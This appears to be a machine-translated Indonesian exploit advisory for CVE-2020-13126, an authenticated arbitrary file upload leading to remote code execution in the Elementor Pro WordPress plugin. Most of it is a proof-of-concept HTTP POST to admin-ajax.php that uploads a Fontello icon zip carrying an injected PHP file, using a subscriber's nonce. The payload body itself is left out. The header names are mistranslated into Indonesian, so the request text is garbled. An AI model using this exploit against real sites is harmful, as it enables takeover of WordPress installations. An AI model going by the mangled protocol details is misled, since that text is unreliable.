Elementor Pro < 2.9.4 - Unggah File Sewenang-wenang RCE (Remote Code Execution) yang Diautentikasi




Kerentanan, yang saat ini dieksploitasi oleh penyerang, memungkinkan setiap pengguna yang masuk untuk mengunggah dan menjalankan skrip PHP di blog dan bahwa ini mempengaruhi plugin Element Pro, bukan versi gratis(free)

Kerentanan ini digunakan bersama dengan kerentanan di Ultimate Addons for Elementor yang memungkinkan pendaftaran pelanggan.


BUKTI KONSEP

Berikut ini adalah contoh posting di mana zip_upload dapat berisi file zip yang dihasilkan fontello dengan file php yang disuntikkan. Nonce yang sah dapat diambil dari sumber halaman /wp-admin setelah diautentikasi sebagai pelanggan untuk bidang _nonce.




POST /wp-admin/admin-ajax.php HTTP/1.1

Tuan rumah:

Konten-Panjang: 38005

Terima: aplikasi/json, teks/javascript, */*;
q=0,01

X-Diminta-Dengan: XMLHttpRequest

Agen-Pengguna: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, seperti Gecko) Chrome/81.0.4044.113 Safari/537.36

Content-Type: multipart/form-data;
batas=----WebKitFormBoundaryczB4AfBdfz6AZDaF

Asal: http://elementorvuln.vhx.cloud:8080

Referensi: [url]/wp-admin/post-new.php?post_type=elementor_icons

Terima-Encoding: gzip, deflate

Bahasa Terima: en-US,en;q=0.9

Kue kering:

Koneksi: tutup

------WebKitFormBoundaryczB4AfBdfz6AZDaF

Isi-Disposisi: formulir-data;
nama="zip_upload"; nama file="fontello-c6dc39d0.zip"

Tipe Konten: aplikasi/zip

**menghilangkan ini untuk singkatnya***

------WebKitFormBoundaryczB4AfBdfz6AZDaF

Isi-Disposisi: formulir-data;
nama="tindakan"

{"pro_assets_manager_custom_icon_upload":{"action":"pro_assets_manager_custom_icon_upload","data":{"post_id":"1"}}}

------WebKitFormBoundaryczB4AfBdfz6AZDaF

Isi-Disposisi: formulir-data;
nama="_nonce"

5052d6f053

------WebKitFormBoundaryczB4AfBdfz6AZDaF

Isi-Disposisi: formulir-data;
nama = "tindakan"

elementor_ajax

------WebKitFormBoundaryczB4AfBdfz6AZDaF———


Klasifikasi

Jenis

RCE

10 besar OWASP
CVE-2020-13126